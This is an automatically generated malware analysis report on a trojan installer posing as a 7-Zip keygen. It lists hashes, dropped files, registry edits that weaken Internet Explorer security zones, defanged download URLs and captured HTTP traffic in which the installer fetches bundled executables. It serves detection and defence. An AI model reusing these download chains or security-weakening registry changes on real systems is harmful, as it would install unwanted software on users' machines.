Trojan.NSIS.StartPage_cd53afa778

by malwarelabrobot on March 4th, 2016 in Malware Descriptions.

Trojan.NSIS.StartPage.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: cd53afa778170a6182c250b7b4b36f6f
SHA1: bdeb84131f29dd695f50108a79a1a21891576e4c
SHA256: ca0714dcf3554a034db01e8494d48c6c7cec0b6ff5abf7dd81ab872a6d0817c4
SSDeep: 3072:SgXdZt9P6D3XJJbCRx7pq01GLeIqhPkI8R e79tJ0LXs6prmvvlz9pGrfiU:Se34WRxd1GDG6 e7WzpyGrqU
Size: 166054 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2009-12-06 00:50:52
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):
No processes have been created.
The Trojan injects its code into the following process(es):

whIkaR9Rme.exe:564
%original file name%.exe:468
cpSetup.exe:380

Mutexes

The following mutexes were created/opened:

ZonesLockedCacheCounterMutex
ZonesCounterMutex
ZonesCacheCounterMutex
RasPbFile
WininetProxyRegistryMutex
WininetConnectionMutex
WininetStartupMutex
c:!documents and settings!adm!local settings!history!history.ie5!
c:!documents and settings!adm!cookies!
c:!documents and settings!adm!local settings!temporary internet files!content.ie5!
_!MSFTHISTORY!_
ShimCacheMutex

File activity

The process whIkaR9Rme.exe:564 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nst4.tmp\NSISdl.dll (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst4.tmp\cpSetup.exe (14751 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst4.tmp\nsArray.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst4.tmp\182741632 (1 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst4.tmp (0 bytes)

The process %original file name%.exe:468 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\56d85d444db76[1].exe (5224 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj2.tmp\whIkaR9Rme.exe (5224 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj2.tmp\29ufGoaPqW (116 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\launch_reb[1].htm (116 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj2.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj2.tmp\inetc.dll (20 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nst1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj2.tmp (0 bytes)

The process cpSetup.exe:380 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\00081064.a (76 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0008169e.a (1730 bytes)

Registry activity

The process whIkaR9Rme.exe:564 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "90 C6 C7 FA 42 7F 25 1B B1 2B 2C AB 4E A2 F4 47"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process %original file name%.exe:468 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F7 AA 55 86 E5 69 3D CF 31 44 C6 63 97 EE 86 C1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process cpSetup.exe:380 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8A 4F 85 87 B6 B1 F2 F1 D6 B2 E0 43 08 82 EF 63"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1456940889"
"Name" = "cpSetup.exe"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"@xpsp3res.dll,-20001" = "Diagnose Connection Problems..."

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

Dropped PE files

MD5 File path
fcda6337ded197931e73b38fad6eff3b c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\00081064.a
9432c3fcde74ce7814639b05d1a490f4 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\0008169e.a
c17103ae9072a06da581dec998343fc1 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsj2.tmp\System.dll
c498ae64b4971132bba676873978de1e c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsj2.tmp\inetc.dll
1f9d4b5504148474f9e06590255a616e c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsj2.tmp\whIkaR9Rme.exe
7caaf58a526da33c24cbe122e7839693 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nst4.tmp\NSISdl.dll
37d9d77f9918a7cd0210300bc4e433b0 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nst4.tmp\cpSetup.exe
89d40ecddf3ce6f3b0e6a84f40936912 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nst4.tmp\nsArray.dll
1f9d4b5504148474f9e06590255a616e c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\56d85d444db76[1].exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 23628 24064 4.46394 856b32eb77dfd6fb67f21d6543272da5
.rdata 28672 4764 5120 3.4982 dc77f8a1e6985a4361c55642680ddb4f
.data 36864 154712 1024 3.3278 7922d4ce117d7d5b3ac2cffe4b0b5e4f
.ndata 192512 40960 0 0 d41d8cd98f00b204e9800998ecf8427e
.rsrc 233472 6056 6144 2.89511 d79d7ed90c8536f556f40e7d03160974

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://dna4mm5c1mahl.cloudfront.net/launch_reb.php?p=sevenzip&tid=5586943&pid=1227&n=S2V5Z2Vu&b_typ=pe
hxxp://d1gahxamcuu9d3.cloudfront.net/stub_maker.php?program=sevenzip&tid=5586943&pid=1227&b_typ=pe&reb=1&name=Keygen
hxxp://dna4mm5c1mahl.cloudfront.net/launch_v5.php?p=sevenzip&pid=1227&tid=5586943&b_typ=pe&n=S2V5Z2Vu&reb=1&ic=
hxxp://d1gahxamcuu9d3.cloudfront.net/?affId=1006&appTitle=Keygen&s1=1227&s2=5586943&setupName=cpSetup&appVersion=2.92&instId=11
hxxp://up.afiledownload27.space/h_redir.php?offer_id=4&aff_id=1006&source=11&aff_sub=1227&aff_sub2=5586943&aff_sub3=0&aff_sub4=0&aff_sub5=0&url=http://up.afiledownload27.space/offer.php?affId={aff_id}&trackingId=11717601&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=xpsp3&db=&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 54.192.95.230
hxxp://capital.go2cloud.org/aff_c?offer_id=4&aff_id=1006&source=11&aff_sub=1227&aff_sub2=5586943&aff_sub3=0&aff_sub4=0&aff_sub5=0&url=http://up.afiledownload27.space/offer.php?affId={aff_id}&trackingId=11717601&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=xpsp3&db=&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 54.194.127.72
hxxp://up.afiledownload27.space/offer.php?affId=1006&trackingId=11717601&instId=11&ho_trackingid=102fdbd3abcdce268f32d0cda9cb4a&cc=UA&cc_typ=ho&sb=x86&wv=xpsp3&db=&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 54.192.95.230
hxxp://up.afiledownload27.space/installer.php?affId=1006&instId=11&ho_trackingid=102fdbd3abcdce268f32d0cda9cb4a&trackingId=11717601&cc=UA&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 54.192.95.230
hxxp://up.dfiledownload28.space/installer.php?affId=1006&instId=11&ho_trackingid=102fdbd3abcdce268f32d0cda9cb4a&trackingId=11717601&cc=UA&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 54.192.95.26
hxxp://up.afiledownload27.space/installer.php?affId=1006&instId=11&ho_trackingid=102fdbd3abcdce268f32d0cda9cb4a&trackingId=11717601&cc=UA&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1&cid=707569c4c57c87d53171d83f71777ffd&uac=1&id[]=855&id[]=856&id[]=631&id[]=632&id[]=852&id[]=854 54.192.95.230
hxxp://up.afiledownload27.spacehxxp://up.afiledownload27.space/offer.php?affId=1006&trackingId=11717601&instId=11&ho_trackingid=102fdbd3abcdce268f32d0cda9cb4a&cc=UA&cc_typ=ho&sb=x86&wv=xpsp3&db=&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 54.192.95.230
hxxp://capital.go2cloud.orghxxp://capital.go2cloud.org/aff_c?offer_id=4&aff_id=1006&source=11&aff_sub=1227&aff_sub2=5586943&aff_sub3=0&aff_sub4=0&aff_sub5=0&url=http://up.afiledownload27.space/offer.php?affId={aff_id}&trackingId=11717601&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=xpsp3&db=&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 54.194.127.72
hxxp://get.slfdio83rh.xyz/?affId=1006&appTitle=Keygen&s1=1227&s2=5586943&setupName=cpSetup&appVersion=2.92&instId=11 54.192.95.26
hxxp://up.afiledownload27.spacehxxp://up.afiledownload27.space/installer.php?affId=1006&instId=11&ho_trackingid=102fdbd3abcdce268f32d0cda9cb4a&trackingId=11717601&cc=UA&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 54.192.95.230
hxxp://up.afiledownload27.spacehxxp://up.afiledownload27.space/installer.php?affId=1006&instId=11&ho_trackingid=102fdbd3abcdce268f32d0cda9cb4a&trackingId=11717601&cc=UA&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1&cid=707569c4c57c87d53171d83f71777ffd&uac=1&id[]=855&id[]=856&id[]=631&id[]=632&id[]=852&id[]=854 54.192.95.230
hxxp://up.sdfuus98d7f.xyz/launch_v5.php?p=sevenzip&pid=1227&tid=5586943&b_typ=pe&n=S2V5Z2Vu&reb=1&ic= 54.192.95.93
hxxp://get.inmyglasse3.xyz/launch_reb.php?p=sevenzip&tid=5586943&pid=1227&n=S2V5Z2Vu&b_typ=pe 54.192.95.219
hxxp://dl.ddownload6.club/stub_maker.php?program=sevenzip&tid=5586943&pid=1227&b_typ=pe&reb=1&name=Keygen 54.192.95.82
hxxp://up.afiledownload27.spacehxxp://up.afiledownload27.space/h_redir.php?offer_id=4&aff_id=1006&source=11&aff_sub=1227&aff_sub2=5586943&aff_sub3=0&aff_sub4=0&aff_sub5=0&url=http://up.afiledownload27.space/offer.php?affId={aff_id}&trackingId=11717601&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=xpsp3&db=&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 54.192.95.230
hxxp://up.dfiledownload28.spacehxxp://up.dfiledownload28.space/installer.php?affId=1006&instId=11&ho_trackingid=102fdbd3abcdce268f32d0cda9cb4a&trackingId=11717601&cc=UA&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 54.192.95.26


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY User-Agent (NSIS_Inetc (Mozilla)) - Sometimes used by hostile installers
ET SHELLCODE Possible Call with No Offset TCP Shellcode

Traffic

GET /launch_reb.php?p=sevenzip&tid=5586943&pid=1227&n=S2V5Z2Vu&b_typ=pe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: get.inmyglasse3.xyz
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Length: 116
Connection: keep-alive
Date: Thu, 03 Mar 2016 15:50:45 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
X-Cache: Miss from cloudfront
Via: 1.1 13e5d0f9ce0aa646324430e310892965.cloudfront.net (CloudFront)
X-Amz-Cf-Id: pyjZcJjVFyMA7OFX6QbGbHJrLUsIPY1kZRFvSbx_Y-abW3ab91Xgng==
s=first..u=hXXp://dl.ddownload6.club/stub_maker.php?program=sevenzip&t
id=5586943&pid=1227&b_typ=pe&reb=1&name=KeygenHTTP/1.1 200 OK..Content
-Type: text/html; charset=UTF-8..Content-Length: 116..Connection: keep
-alive..Date: Thu, 03 Mar 2016 15:50:45 GMT..Server: Apache/2.2.15 (Ce
ntOS)..X-Powered-By: PHP/5.3.3..X-Cache: Miss from cloudfront..Via: 1.
1 13e5d0f9ce0aa646324430e310892965.cloudfront.net (CloudFront)..X-Amz-
Cf-Id: pyjZcJjVFyMA7OFX6QbGbHJrLUsIPY1kZRFvSbx_Y-abW3ab91Xgng==..s=fir
st..u=hXXp://dl.ddownload6.club/stub_maker.php?program=sevenzip&tid=55
86943&pid=1227&b_typ=pe&reb=1&name=Keygen..



GET hXXp://up.afiledownload27.space/offer.php?affId=1006&trackingId=11717601&instId=11&ho_trackingid=102fdbd3abcdce268f32d0cda9cb4a&cc=UA&cc_typ=ho&sb=x86&wv=xpsp3&db=&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 HTTP/1.1
Host: up.afiledownload27.space
Connection: close
Accept: */*
User-Agent: InstallCapital


HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 76840
Connection: close
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Date: Thu, 03 Mar 2016 15:50:41 GMT
X-Cache: Miss from cloudfront
Via: 1.1 8a4d4882753d62d900bb1b7541308eca.cloudfront.net (CloudFront)
X-Amz-Cf-Id: bE2RH4xizxx-6jCHjhyIqeBErhBc_7x6oQCd8Gk0tIih_nflw2U-Lw==
......6_6.e...NVz8Q.d....8..K..ju..|...N.Z...c..Tp....<k..r.~d.,w.3
..Cj.,...{\.oA.....b.AD.5(...%[.u$.FQ....{21.......NC...&.,.C*....PV..
.(.r.....h..\....U....n......3..F.L..I.V(a..F..w;...W..V..<..i.F...
#./%Sr..c.Y.Wq..m.^8.T`.B..........<..P.....1&.....g.(.`.''.D..2.A.
.vp.....=.._p.gH4.(..u?m'...(.K...^u...........:.0.{...WA. .~.........
.C....j...._..m6..%.x..!C;...'...O.v.uNz.......0 .."...;Y.. ....OB..].
t..@...;..9../n.<.%.R;HD..!pjQ..R,?p.x........DwRm/[email protected]*.?..y@
0.../.d ...<....A.n.....[(.C.8....G.r.Q...8.Yn.[.<;.....6%.e....
4)[email protected] .o8.*[email protected]..^|2.o*?...H=..*........8.'......t.A
..~>.U>[email protected].'..&.T.0.....AJ\..sf.......J.u..'a
V..,..y...z.....@EG.....^r.5&..Y.....QJ1..X`,{....n......f..-M.%.....q
..rx....=.......C.....(6..e`Py.....n.t{..Ld..%...@2S:.......%K..qw6...
....Y.s............e6Y..r...Fj7...N.X...f. .u...b.h.XI..K\.[dh]....P..
C....._....a7.(.....'..L@..,.7t....a..|.....;... @.e.(*....^.s'.!....^
|..._sM|7.(X. r-.|.G *08..W..........>.....l..T....U..^..N<.....
1p.w9yl.V.....4...2.....%..F.j.Y .SD....C.OC..V.F.od....:.a.X2U^@...3.
...o*=......xq.Q./i..(;..q...2Fu.....P... U?..G..O.K{$.....#1...~Dl.X.
i<...{.....x.....~.ssXD..#.....$.s...........K.`v..EDV.mn.........(
...X..'ap].S....p...<.....?.~...L.P|Y.W.....:.dz.2..1'..O.j.V......
:iIg..............\..?U.[L.P.]F..mI...'K.i....F>*nO.(.R.._.>M3.A
.!.......$...<.d...i...&.o..Sq.-Yr...J.c.r.....7..L....3M.P.q-!....
#Y.....o.I.3.'LP..lV..?..3...p.<.u....d...v...-......j.z.u..D.q
<<< skipped >>>


GET /launch_v5.php?p=sevenzip&pid=1227&tid=5586943&b_typ=pe&n=S2V5Z2Vu&reb=1&ic= HTTP/1.0
Host: up.sdfuus98d7f.xyz
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*


HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Length: 1653
Connection: close
Date: Thu, 03 Mar 2016 15:50:47 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
X-Cache: Miss from cloudfront
Via: 1.1 13e5d0f9ce0aa646324430e310892965.cloudfront.net (CloudFront)
X-Amz-Cf-Id: ZgZvtN44l2TvzBy5kyO3WET__417C7TrgS-kzrbUHt0OHFhvJ__mbA==
files=4.t1=dl.u1=hXXp://get.slfdio83rh.xyz/?affId=1006&appTitle=Keygen
&s1=1227&s2=5586943&setupName=cpSetup&appVersion=2.92&instId=11.n1=cpS
etup.exe.b1=cp.c1=sevenzip-1.s1=0.m1=0.d1=0.t2=dl.u2=hXXp://get.file88
8desktop.info/?p=24718&d=30497&l=29729&dynamicname=Keygen&filename=set
up-1228&exeurl=http://d16oc15frjt76r.cloudfront.net/setup_ru.e
xe>=get75&ts=14533669397&con=1&prl=1&d1=5586943&d2=1227.n2=setup-122
8.exe.b2=ru.c2=sevenzip-2.s2=0.m2=1.d2=1500.t3=dl.u3=hXXp://VVV.autoju
ly16-hp-download.biz/download.php?version=1.1.5.26&monitor=1&z2=0&ci=2
140&appsetupurl=http://pe-sixi.com/downloadS.php?bu=am&pre
fix=Setup&instid[appname]=installer&instid[cmdline]=/S&instid[appima
geurl]=http://pe-sixi.com/img/icon_installer.png.n3=Setup__2
140_il189.exe.b3=am.c3=2140-sevenzip.s3=0.m3=0.d3=0.t4=dl.u4=hXXp://st
api.sweetcomet.com/api/stamp/setup.exe?&affiliateid=1780&productname=K
eygen&producturl=http://d3pccup19xda2t.cloudfront.net/sevenzip
-setup-ap.exe&productimage=http://d3pccup19xda2t.cloudfront.net%
2Fpe/szip_pub.png&productversion=9.20&producteula=http://seven
zip.info/terms.html&productsize=1.06MB&productcmd=s&publishercont
act=http://sevenzip.info&productbusiness=sd,se,ad,co,prm
,wsa,ita,serp,bro&antivirusPolicy=2&subid=1227&subid2=5586943.
n4=SevenZip-apset.exe.b4=ap.c4=sevenzip.s4=0.m4=0.d4=0.t5=dl.u5=http:/
/sub.spirlymo.com/installers/cli/1457017331461/SevenZip_downloader-Q0i
7uvJmR.exe.n5=SevenZip_downloader-Q0i7uvJmR.exe.b5=bi.c5=sevenzip-
<<< skipped >>>


GET /stub_maker.php?program=sevenzip&tid=5586943&pid=1227&b_typ=pe&reb=1&name=Keygen HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: dl.ddownload6.club
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Content-Type: application/force-download
Content-Length: 66823
Connection: keep-alive
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.28
Content-Disposition: attachment; filename="56d85d444db76.exe"
X-Powered-By: ASP.NET
Date: Thu, 03 Mar 2016 15:50:28 GMT
X-Cache: Miss from cloudfront
Via: 1.1 4cebe2fc1703437d8a79e556e38f6d7a.cloudfront.net (CloudFront)
X-Amz-Cf-Id: kkOHJ1rMp5xLPtBlyxOBJG6dkuaCfYE3W60SCcuSdgswJD9P7XIB0Q==
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8
...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8.......
.PE..L.....GO.................t...z...B...8............@..............
.........................@.................................@..........
......................`...............................................
........................................text....r.......t.............
..... ..`.rdata..n .......,...x..............@[email protected].... ...........
[email protected]......
.........................@[email protected][email protected].
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U....\.}..t .}.F.E.u..H
[email protected][email protected]...
..@..}[email protected]... M..........M........E...FQ.....NU
..M.......M...VT..U........FP..E...............E.P.M...H.@..E..P.E..E.
[email protected]}[email protected].}.j.W.E......E.....
[email protected][email protected][email protected] [email protected].
u.....@._^3.[.....L$....G...i. @...T.....tUVW.q.3.;5..G.sD..i. @...D..
S.....t.G.....t...O..t .....u...3....3...F. @..;5..G.r.[_^...U..QQ
<<< skipped >>>


POST hXXp://up.afiledownload27.space/installer.php?affId=1006&instId=11&ho_trackingid=102fdbd3abcdce268f32d0cda9cb4a&trackingId=11717601&cc=UA&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 HTTP/1.1
Host: up.afiledownload27.space
Connection: close
Accept: */*
User-Agent: InstallCapital
Content-Type: application/x-www-form-urlencoded

cid=707569c4c57c87d53171d83f71777ffd&uac=1&id[]=855&id[]=856&id[]=631&id[]=632&id[]=852&id[]=854
HTTP/1.1 403 Forbidden
Server: CloudFront
Date: Thu, 03 Mar 2016 15:50:53 GMT
Content-Type: text/html
Content-Length: 689
Connection: close
X-Cache: Error from cloudfront
Via: 1.1 73a3bce79e63d88b3a25c9ced0be16f5.cloudfront.net (CloudFront)
X-Amz-Cf-Id: fcSbLmuhz8cR-i4lAtzvgkN_qhOhk-6z6GB45hgOyMYiGEYAYy_ADQ==
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "htt
p://VVV.w3.org/TR/html4/loose.dtd">.<HTML><HEAD><MET
A HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
;.<TITLE>ERROR: The request could not be satisfied</TITLE>
.</HEAD><BODY>.<H1>ERROR</H1>.<H2>The re
quest could not be satisfied.</H2>.<HR noshade size="1px">
.This distribution is not configured to allow the HTTP request method 
that was used for this request. The distribution supports only cachabl
e requests..<BR clear="all">.<HR noshade size="1px">.<P
